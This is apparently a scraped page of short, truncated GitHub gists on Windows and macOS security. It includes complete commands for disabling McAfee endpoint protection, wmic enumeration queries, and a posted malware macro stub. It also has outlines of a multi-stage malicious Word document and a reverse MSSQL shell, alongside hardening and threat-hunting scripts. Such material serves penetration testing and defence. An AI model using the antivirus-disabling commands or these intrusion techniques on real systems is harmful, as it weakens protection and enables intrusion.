@tegansnyder
tegansnyder / disable mcafee endpoint protection.md
Last active October 29, 2024 13:49
Disable McAfee Endpoint Protection OSX

method 1

sudo /usr/local/McAfee/AntiMalware/VSControl stopoas

alternatively

sudo defaults write /Library/Preferences/com.mcafee.ssm.antimalware.plist OAS_Enable -bool False
sudo /usr/local/McAfee/AntiMalware/VSControl stop
sudo /usr/local/McAfee/AntiMalware/VSControl reload
@xorrior
xorrior / wmic_cmds.txt
Last active May 13, 2025 05:33
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@rsmudge
rsmudge / oneliner.cna
Created July 7, 2016 21:07
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;
anonymous
anonymous / gist:d0da355e5c21a122866808d37234cd5d
Created October 23, 2016 00:12
PowerShell malware [posted by @JohnLaTwC]
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active May 26, 2025 12:25
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@mackwage
mackwage / windows_hardening.cmd
Last active May 29, 2025 01:31
Script to perform some hardening of Windows OS
:: Windows 10 Hardening Script
:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering.
:: Obligatory 'views are my own'. :)
:: Thank you @jaredhaight for the Win Firewall config recommendations!
:: Thank you @ricardojba for the DLL Safe Order Search reg key!
:: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings!
:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
:
@mgeeky
mgeeky / muti-stage-1.md
Last active May 21, 2023 00:24
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulting document will be:

  • using the OLE event autorun method
  • removing its pretext shapes
  • obtaining commands to be executed from the document's Author property and passing them to StdIn of the Powershell.exe process
  • leveraging the certutil technique to receive a Base64-encoded malicious HTA document
  • having a Base64-encoded Powershell command in that Author property
@xassiz
xassiz / mandros.py
Created March 16, 2018 07:53
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@ricardojba
ricardojba / windows_hardening.cmd
Last active April 23, 2025 10:35
A Windows hardening script
::##########################################################################################################################
::
:: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing,
::
:: OR BOTH!!!
::
:: YOU HAVE BEEN WARNED!!!!!!!!!!
::
:: This script is provided "AS IS" with no warranties, and confers no rights.
:: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section,
@nullbind
nullbind / QuickDumpComputersAndSPN.ps1
Created June 19, 2018 02:08
QuickDumpAllComputerandSPN
# -------------------------------------------
# Function: Get-DomainObject
# -------------------------------------------
# Based on Get-ADObject function from:
# https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1
function Get-DomainObject
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,